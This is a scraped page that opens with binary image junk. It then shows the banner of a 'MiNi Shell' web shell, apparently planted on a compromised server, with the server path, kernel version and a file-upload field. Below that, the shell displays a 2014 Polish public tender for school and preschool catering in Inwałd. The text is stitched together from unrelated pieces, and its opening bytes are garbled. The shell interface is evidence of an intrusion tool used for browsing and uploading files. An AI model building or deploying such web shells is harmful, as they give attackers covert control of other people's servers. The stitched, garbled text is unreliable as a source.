JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140806/170387-N-2014.html

<p class="kh_header"><b>Inwałd: Świadczenie usług cateringowych 
dla Zespołu Szkół Samorządowych w Inwałdzie</b><br>
<b>Numer ogłoszenia: 170387 - 2014; data zamieszczenia: 06.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Samorządowych w Inwałdzie , ul. Wadowicka 79, 34-120 Inwałd, woj. małopolskie, tel. 0-33 875 13 22, faks 0-33 875 13 22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych 
dla Zespołu Szkół Samorządowych w Inwałdzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Świadczenie usług cateringowych (zupy oraz drugiego dania obiadowego wraz z kompotem) dla stołówki Zespołu Szkół Samorządowych w Inwałdzie  oraz ( zupy i drugiego dania obiadowego wraz z kompotem) dla dzieci 3-6 letnich Przedszkola przy Zespole Szkół Samorządowych w  Inwałdzie 
Wykaz  zestawów zup dla Przedszkola :
Zestaw 1:
Rosół  z  makaronem   -  300  ml.
Zupa  ogórkowa  z  ryżem   -  300  ml. 
Zupa  pomidorowa  z  makaronem  -   300  ml. 
Zupa  jarzynowa z  ziemniakami    -  300  ml.
Żurek z ziemniakami i białą kiełbasą  -  300  ml. 
Zestaw 2:
Zupa grysikowa na rosole  -  300 ml.
Krupnik zabielany  z  ziemniakami  -   300  ml. 
Barszcz ukraiński  - 300 ml.
Barszcz biały z jajkiem - 300 ml.
Zupa koperkowa z makaronem - 300 ml.
Zestaw 3:
Zupa kalafiorowa z tartym ciastem - 300 ml. 
Zupa pieczarkowa   z grzankami  -    300  ml. ,
Krem z zielonego groszku z grzankami  - 300 ml.
Kluski grysikowe na rosole  -  300 ml.
Zupa brokułowa  (krem) z kulkami ptysiowymi - 300 ml.
Wykaz zestawów w ramach drugiego dania obiadowego wraz z kompotem dla Przedszkola
ZESTAW I: pierogi leniwe 200g + masło 10g + cukier 10g + kompot 150 ml.
ZESTAW II: Kotlet mielony 70g + ziemniaki  150 g + mizeria 100g + kompot 150 ml.
ZESTAW III: Pulpety rybne 70g + sos śmietankowo-koperkowy 10g + surówka z kiszonej kapusty 100g + kompot 150ml. 
ZESTAW IV: Kotlet z kurczaka 70g + ziemniaki 150 g + buraczki mielone 100g + kompot 150 ml.
ZESTAW V: Makaron po bolońsku  200g + sos pomidorowy 20g + kompot 150 ml.
ZESTAW VI: Filet z indyka 70g + ziemniaki 150g + kapusta pekińska z sosem winegret 100g + kompot 150 ml.
ZESTAW VII: Naleśniki z serem białym 200 g + polewa malinowa 20g + kompot 150 ml.
ZESTAW VIII: Filet rybny panierowany 70g + ziemniaki 150g + surówka z marchwi 100g + kompot 150ml.
ZESTAW IX: Kurczak w jarzynach 100g + ryż na sypko 45g + kompot 150 ml.
ZESTAW X: Bitki wołowe 100g + ziemniaki  150g + sałatka szwedzka 100g + kompot 150 ml.
ZESTAW XI: Pierogi truskawkowe 200g + masło 10g + cukier 10g + kompot 150 ml.
ZESTAW XII: Pieczeń z indyka w sosie śmietankowym 80g + ziemniaki 150g + ogórek kiszony 100g + kompot 150 ml.
ZESTAW XIII: Racuchy z jabłkami 200g + cukier 10g + kompot 150 ml.
ZESTAW XIV: Risotto cielęce 70 g + kasza jęczmienna 45g + sos pomidorowy 10g + kompot 150ml.
ZESTAWXV: Pulpety w sosie własnym 80g + ziemniaki 150g + buraki 100g + kompot 150 ml.
ZESTAW XVI: Gulasz  100g + kluski śląskie 150g + sałatka z czerwonej kapusty 100g + kompot 150 ml.
ZESTAW XVII: Ryż na sypko 45g + polewa truskawkowa 30g + kompot truskawkowy 150 ml.
ZESTAW XVIII: Chikeny z kurczaka 70g + ziemniaki 150g + surówka marchwi i jabłka 100g + kompot 150 ml. 
ZESTAW XIX: Kluski na parze 200g + polewa truskawkowa 30g + kompot 150 ml.
ZESTAW XIX: Filet z dorsza 70g + ziemniaki 150g + kapusta zasmażana 100g + kompot 150ml.
ZESTAW XX: Pierogi serem biały 200g + masło 10g + cukier 10g + kompot 150 ml.
Wykaz  zestawów  zup :
Zestaw 1:
Rosół  z  makaronem   -  350  ml.
Zupa  ogórkowa  z  ryżem   -  350  ml. 
Zupa  pomidorowa  z  grubym makaronem  - świderki  -   350  ml. 
Krem z dyni posypany żółtym serem    -  350  ml.
Barszcz   zabielany  z  ziemniakami  i  jajkiem  -  350  ml. 
Zestaw 2:
Zupa koperkowa z makaronem - rurki - 350 ml.
Krupnik zabielany  z  ziemniakami  -   350  ml. 
Zupa z grochu omielanego z grzankami - 350 ml.
Barszcz biały z jajkiem - 350 ml.
Zupa koperkowa z makaronem - 350 ml.
Zestaw 3:
Zupa ziemniaczana z  kiełbasą  -  350  ml. 
Zupa kalafiorowa - 350 ml. 
Zupa pieczarkowa   z grzankami  -    350  ml. 
Barszcz czerwony z ziemniakami i jajkiem - 350 ml.
Zupa brokułowa  (krem) z kulkami ptysiowymi - 350 ml.
Wykaz zestawów w ramach drugiego dania obiadowego wraz z kompotem
ZESTAW I: kotlet dewolay 100g + ziemniaki 220g + surówka z kiszonej kapusty 170g +   kompot 200ml 
ZESTAW II: gołąbki w sosie pomidorowym 400 g   + kompot 200 ml  
ZESTAW III: kotlet drobiowy 100 g + ziemniaki 220 g + buraczki 170 g + kompot 200 ml
ZESTAW IV : gulasz wieprzowy 100g + kasza jęczmienna 220g +   ogórek kiszony   170g + kompot 200ml 
ZESTAW  V  :  filet z dorsza 100 g + ziemniaki 220 g + surówka z porów z jabłkiem 
i marchewką    170 g + kompot 200 ml
ZESTAW VI : kotlet  schabowy  100 g. +  ziemniaki  220 g. +  kapusta zasmażana   170  g+ kompot  200 ml.
ZESTAW VII : gyros z kurczaka 100 g + ryż 220 g + surówka z selera 170 g + kompot 200 ml
ZESTAW VIII : filet z  kurczaka  w płatkach 100g + ziemniaki 220g + buraczki  170g 
+ kompot 200ml
ZESTAW IX  : makaron pene z sosem alla  bolonez  i serem 400 g + kompot 200 ml
ZESTAW X  : makaron świderki z białym serem - 400 g + kompot 200 ml  
ZESTAW XI: kurczak w sosie słodko-kwaśnym - 300 g + ryż 100 g + kompot 200 ml
ZESTAW XII: udko z kurczaka 100 g + ziemniaki 220 g + marchewka z groszkiem 170 g + kompot 200 ml
ZESTAW XIII  : klopsy w sosie pieczarkowym 100 g + ziemniaki 220 g + surówka z kapusty pekińskiej 170 g + kompot 200 ml
ZESTAW XIV: filet drobiowy w  cieście100 g + ziemniaki 220 g + buraczki 170 g + kompot 200 ml
ZESTAW  XV :  naleśniki  z  serem   i  dżemem  truskawkowym   400 g  +  kompot   200 ml. 
ZESTAW XVI : zrazy z boczkiem i marchewką 100 g + ziemniaki 220 g + bukiet jarzyn 170 g + kompot 200 ml
ZESTAW XVII : pieczeń wieprzowa 100 g + kluski śląskie 220 g + kapusta czerwona 170 g + kompot 200 ml 
ZESTAW XVIII : kotlet drobiowy 100 g + ziemniaki 220 g + surówka z selera 170 g 
+ kompot 200 ml
ZESTAW XIX : pierogi z owocami 400 g + kompot 200 ml 
ZESTAW XX :  łazanki z kapustą i pieczarkami 400 g + kompot 200 ml         
Wykonawca będzie dostarczał posiłki dla  szkoły  w poszczególnych dniach żywienia zgodnie z kolejnością zestawów zup oraz zestawów drugiego dania obiadowego oraz zestawów dla Przedszkola z pkt I niniejszej SIWZ. W przypadku większej liczby dni żywienia w danym miesiącu wydawane będą kolejne zestawy obiadowe poczynając od pierwszego w wykazie. Raz w tygodniu (piątek) serwowana jest potrawa bezmięsna. Zamawiający zastrzega możliwość korekty jadłospisu za zgodą Wykonawcy. 
A)Zamawiający planuje, że:
- dziennie do  Szkoły   należy dostarczyć 90 obiadów( drugie danie obiadowe wraz z kompotem ) oraz 40 zup. Do końca roku 2014 należy dostarczyć 6930  obiadów( drugie danie obiadowe wraz  z kompotem )tj.  90   obiadów  x  77  dni , oraz  3080 zup tj. 40 zup x 77 dni,
- dziennie do  Przedszkola  należy dostarczyć  25 obiadów(drugie danie obiadowe wraz z kompotem ),oraz  25 zup . Do  końca roku 2014 należy dostarczyć 2125  zestawów   tj. 25 obiadów x 85 dni i  25 zup  x 85  dni .
Miesiąc dostawy	Ilość dni usługi 	Ilość dni usługi - Przedszkole
Wrzesień	20	22
Październik	22	23
Listopad	19	19
Grudzień	16	21
B) Zamawiający zastrzega, że liczba posiłków jest zmienna. 
Zamawiający danego dnia do godz. 9.00 poinformuje Wykonawcę o ilości dostarczanych posiłków. Ilość posiłków będzie się zmieniać w zależności od frekwencji dzieci. Wykonawca nie może mieć w stosunku do Zamawiającego żadnych roszczeń z powodu realizacji umowy w mniejszym zakresie.
C) Wszystkie posiłki powinny być przygotowane zgodnie z obowiązującymi normami i przepisami prawa. 
- Wykonawca będzie przygotowywał posiłki zgodnie z zasadami określonymi w ustawie  o bezpieczeństwie żywności i żywienia (Dz. U. z 2010r. nr 21 poz. 105 z późn. zm. ) łącznie z przepisami wykonawczymi do tej ustawy.
- Jadłospis układany będzie przez Wykonawcę (zaleca się różnorodność i niepowtarzalność dziennych zestawów żywieniowych).
 - Bezwzględnie należy przestrzegać norm na składniki pokarmowe i produkty spożywcze określone przez Instytut Żywienia i Żywności. Posiłki mają być przygotowane zgodnie z zasadami racjonalnego żywienia dzieci i młodzieży. 
- Wykonawca będzie przygotowywał posiłki w obiektach lub obiekcie, dla którego Wykonawca posiada decyzję Inspektora Sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków dla potrzeb zbiorowego żywienia dzieci oraz dostarczał posiłki zachowując wymogi sanitarno- epidemiologiczne  w zakresie personelu i warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie. 
- Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP.  Obowiązkiem Wykonawcy jest przechowywanie próbek pokarmowych ze wszystkich przygotowanych                                 i dostarczonych posiłków, każdego dnia przez okres 72 godzin z oznaczeniem daty, godziny, zawartości próbki pokarmowej, z podpisem osoby odpowiedzialnej za pobieranie tych próbek.  Za dokumentację z zakresu dobrej praktyki higienicznej i elementy systemu HACCP lub systemu równoważnego dostosowane do warunków cateringowych odpowiada Wykonawca.
Zamawiający zastrzega sobie prawo bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i jakości wykonywanych usług. 
D) Wykonawca odpowiada za transport przedmiotu zamówienia zgodnie z wymaganiami sanitarnymi dotyczącymi żywności. 
- Transport posiłków powinien odbywać się w pojemnikach transportowych - termosach wykonanych z polipropylenu z podwójnymi ściankami izolującymi zapewniających właściwą ochronę i temperaturę oraz jakość przewożonych potraw środkami transportu przystosowanymi do przewozu żywności. 
- Dostarczenie posiłków z miejsca produkcji do pomieszczenia dystrybucji w szkole realizowane będzie przez Wykonawcę na jego koszt.
- Wykonawca dostarczy szczelne pojemniki na odpady żywnościowe. Po spożyciu posiłków Wykonawca usunie tego samego dnia z terenu szkoły wszelkie odpady żywnościowe na swój koszt. 
- Koszty związane z myciem zastawy obiadowej, sprzątaniem kuchni ponosić będzie Zamawiający.
- Wykonawca  przyuczy  na  swój  koszt obsługę  stołówki Zamawiającego  do  wydawania  posiłków ( porcjowanie  posiłków )  przez  pierwszy  tydzień  żywienia .
E) Koszty związane z myciem termosów - pojemników transportowych ponosić będzie  Wykonawca i zobowiązuje się do ich mycia w swojej siedzibie. Koszty te są ujęte przez Wykonawcę   w cenie obiadu.
F) Posiłki dla Szkoły Podstawowej i Gimnazjum będą wydawane na zastawie obiadowej (110 sztuk dużych talerzy i 50 talerzy  głębokich    na  zupy,  sztućce: widelce, noże po - 110  szt. oraz łyżki 50 sztuk)- użyczonej nieodpłatnie Zamawiającemu przez Wykonawcę na okres obowiązywania umowy. 
G) Posiłki dla Przedszkola będą wydawane na zastawie obiadowej (25 sztuk dużych talerzy i 25 miseczek  na  zupy,  sztućce: widelce, noże po - 25  szt. oraz łyżki 25 sztuk, )- użyczonej nieodpłatnie Zamawiającemu przez Wykonawcę na okres obowiązywania umowy. 
-Ponadto Wykonawca w ramach usługi użyczy nieodpłatnie Zamawiającemu środki myjące  przeznaczone do zmywarki, termometr do mierzenia temperatury potraw na okres obowiązywania umowy. W razie awarii Wykonawca użyczy nieodpłatnie zmywarki Zamawiającemu.  Wykonawca użyczy także  nieodpłatnie Zamawiającemu: dwukomorowy podgrzewacz (z niezależną regulacją temperatur na każdą komorę wraz z piekarnikiem do pojemników transportowych z posiłkami-1 szt., zamawiający będzie wydawał obiady na kilku przerwach międzylekcyjnych )    oraz  lodówkę - 1 szt. , na okres obowiązywania umowy.
 - Zamawiający nie ponosi odpowiedzialności finansowej za zniszczenie i uszkodzenie  termosów  pojemników i  podgrzewaczy  z przyczyn niezależnych od Zamawiającego oraz za stłuczenie w trakcie użytkowania 10% zastawy użyczonej przez Wykonawcę. 
- Braki w zastawie powyżej 10% uzupełni Zamawiający na swój koszt. 
H) Wykonawca gwarantuje, że usługi świadczone będą na najwyższym poziomie, a mianowicie:
Dostarczone posiłki muszą być świeże i winny być przyrządzone w dniu dostawy.
I) Wykonawca zobowiązuje się do terminowego dostarczania posiłków w okresie od 03.09.2014 r. do 22.12.2014 r. w dniach pracy szkoły z wyłączeniem: ferii zimowych i letnich, dni świątecznych, ustawowo i dodatkowo wolnych dni od zajęć dydaktyczno - wychowawczych, w stałych godzinach przerwy międzylekcyjnej od godz. 10.50 do godz. 11.00. 
J) Wykonawca zobowiązuje się do terminowego dostarczania  i wydawania posiłków dla Przedszkola w okresie od 01.09.2014 r. do 31.12.2014 r. w dniach pracy przedszkola  z wyłączeniem: ferii letnich, dni świątecznych, ustawowo i dodatkowo wolnych dni od zajęć dydaktyczno - wychowawczych, w stałych godzinach: od 10.50-11.00.
W przypadku awarii lub innych nie przewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o niezgorszej jakości na swój koszt z innych źródeł. 
K) Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach rozliczeniowych na podstawie ilości dostarczonych posiłków przez Wykonawcę i płatne na rachunek Wykonawcy w terminie 14 dni licząc od dnia otrzymania przez Zamawiającego prawidłowej pod  względem formalnym i rachunkowym faktury VAT. Do faktury należy dołączyć wartości kaloryczne oraz normy dostarczonych posiłków.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości  do 50 % wartości zamówienia podstawowego zgodnie z art. 67 ust.1 pkt.6  ust. Prawo Zamówień Publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca: a) złoży oświadczenie o spełnianiu warunków - na formularzu wg wzoru jak w załączniku nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
A. wykaże (na formularzu wg wzoru jak w załączniku nr 3 do SIWZ), że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną usługę cateringową (przygotowywanie i transport ciepłego posiłku) trwającą co najmniej dwanaście miesięcy dla minimum  30 dzieci przedszkolnych lub  młodzieży szkolnej. W przypadku wykonywania i nie zakończenia jeszcze usługi Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełniania warunku. Fakt wykonania takiej usługi musi być potwierdzony dokumentem, że usługa została wykonana należycie lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
złoży oświadczenie o spełnianiu  warunków - na formularzu wg wzoru jak w załączniku nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
złoży oświadczenie o spełnianiu  warunków - na formularzu wg wzoru jak w załączniku nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
1. wykaże się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200 000,00 zł. brutto  (w  przypadku braku potwierdzenia w treści polisy opłaty należy załączyć dokumenty, które będą ten fakt potwierdzać)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy (według wzoru - załącznik nr 4 do SIWZ   ).
2. listę pomiotów należących do tej samej grupy kapitałowej (w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów Dz. U . Nr 50 poz.331 z późn . zm. )w przypadku gdy Wykonawca należy do grupy kapitałowej .
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Pisemne  zobowiązanie podmiotu trzeciego, należy załączyć do oferty w oryginale, zawierające podpis podmiotu trzeciego pod treścią oświadczenia . 
Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów za zasadach określonych  w art. 26 ust. 2b ustawy Prawo zamówień publicznych, to Zamawiający wymaga przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których ten podmiot posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową podmiotu, wystawionej nie wcześniej niż 3 miesiące przed upływem składania ofert.
Dotyczy Wykonawców składających wspólną ofertę:
